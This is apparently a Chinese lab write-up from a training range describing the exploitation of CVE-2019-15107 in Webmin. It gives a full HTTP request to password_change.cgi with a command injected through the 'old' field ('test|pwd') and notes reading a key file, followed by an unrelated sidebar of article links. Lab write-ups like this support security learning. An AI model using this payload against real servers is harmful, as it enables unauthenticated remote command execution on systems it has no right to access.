当前位置:网站首页>墨者学院-Webmin未经身份验证的远程代码执行
墨者学院-Webmin未经身份验证的远程代码执行
2022-07-04 07:40:00 【Lyswbb】
首先拿到靶场后进行访问,访问后来到一个登陆页面
根据题目可知,未授权的rce,所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication
burp抓取流量包,然后修改参数,注意需要把session_login.cgi改成password_change.cgi,下面的参数直接复制就行,这个漏洞点的触发只需要传一个expired参数执行命令即可
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
直接查询根下的key.txt即可
边栏推荐
- L1-023 output gplt (20 points)
- L2-013 red alarm (C language) and relevant knowledge of parallel search
- Recursive Fusion and Deformable Spatiotemporal Attention for Video Compression Artifact Reduction
- Implementation of ZABBIX agent active mode
- Zephyr study notes 2, scheduling
- Introduction to rce in attack and defense world
- JVM -- class loading process and runtime data area
- Technical experts from large factories: common thinking models in architecture design
- User login function: simple but difficult
- What are the work contents of operation and maintenance engineers? Can you list it in detail?
猜你喜欢
Book list | as the technical support Party of the Winter Olympics, Alibaba cloud's technology is written in these books!
Go learning notes - constants
Google's official response: we have not given up tensorflow and will develop side by side with Jax in the future
Implementation of ZABBIX agent active mode
Zephyr study notes 2, scheduling
The number of patent applications in China has again surpassed that of the United States and Japan, ranking first in the world for 11 consecutive years
L1-027 rental (20 points)
In the era of low code development, is it still needed?
Comparison between applet framework and platform compilation
![[Flink] temporal semantics and watermark](/img/4d/cf9c7e80ea416155cee62cdec8a5bb.jpg)
[Flink] temporal semantics and watermark
随机推荐
Leetcode (215) -- the kth largest element in the array
How to use MOS tube to realize the anti reverse connection circuit of power supply
OKR vs. KPI 一次搞清楚这两大概念!
With excellent strength, wangchain technology, together with IBM and Huawei, has entered the annual contribution list of "super ledger"!
Heap concept in JVM
时序数据库 InfluxDB 2.2 初探
Project 1 household accounting software (goal + demand description + code explanation + basic fund and revenue and expenditure details record + realization of keyboard access)
手写简易版flexible.js以及源码分析
tornado之目录
BasicVSR++: Improving Video Super-Resolutionwith Enhanced Propagation and Alignment
L1-026 I love gplt (5 points)
神经网络入门(下)
博客停更声明
【Kubernetes系列】Kubernetes 上安装 KubeSphere
The frost peel off the purple dragon scale, and the xiariba people will talk about database SQL optimization and the principle of indexing (primary / secondary / clustered / non clustered)
Activiti常见操作数据表关系
[C language] open the door of C
System architecture design of circle of friends
Docker install MySQL
Linear algebra 1.1